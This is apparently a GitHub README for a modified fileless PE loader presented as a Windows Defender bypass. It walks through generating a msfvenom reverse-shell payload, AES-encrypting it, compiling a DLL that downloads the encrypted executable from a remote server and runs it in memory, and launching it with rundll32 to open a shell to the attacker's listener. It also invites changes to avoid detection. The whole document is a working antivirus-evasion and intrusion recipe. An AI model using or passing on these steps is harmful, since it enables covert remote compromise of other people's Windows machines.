
Microsoft windows defender bypass.

Primary LanguageC++MIT LicenseMIT


Tested on 31-07-2023. [Defender may detect it at the time of you using this. Feel free to do any modifications.]


This is a modified version of @TheD1rkMtr's FilelessPELoader program. The link to the original repo is https://github.com/TheD1rkMtr/FilelessPELoader/. It works by loading Remote AES Encrypted PE in memory, decrypts it and run it.


  1. Clone the repository.

  2. Edit the IP , port in FilelessPELoader.cpp script.

  3. Use the aes.py script to create encrypted bin files.

    In the POC, I generated the reverse shell payload using msfvenom and encrypted it using aes.py. The syntax for the same is

msfvenom -p windows/x64/shell_reverse_tcp lhost=IP lport=PORT -f exe -o shell.exe

python3 aes.py shell.exe

Successfull execution of the above command will create two files named cipher.bin and key.bin. [ If you rename these files, make sure to change the names in FilelessPELoader.cpp file as well ]

  1. Use the following command to compile FilelessPELoader.cpp to a dll. x86_64-w64-mingw32-g++ FilelessPELoader.cpp -l winhttp -shared --static -o a.dll

5.Once dll is created, start the web server and your listener.

  1. Transfer the dll to a windows machine.

  2. Open command prompt and run the following command.

rundll32 a.dll, DllRegistryServer

  1. After a second, You will see the connection in your terminal where you started your listener.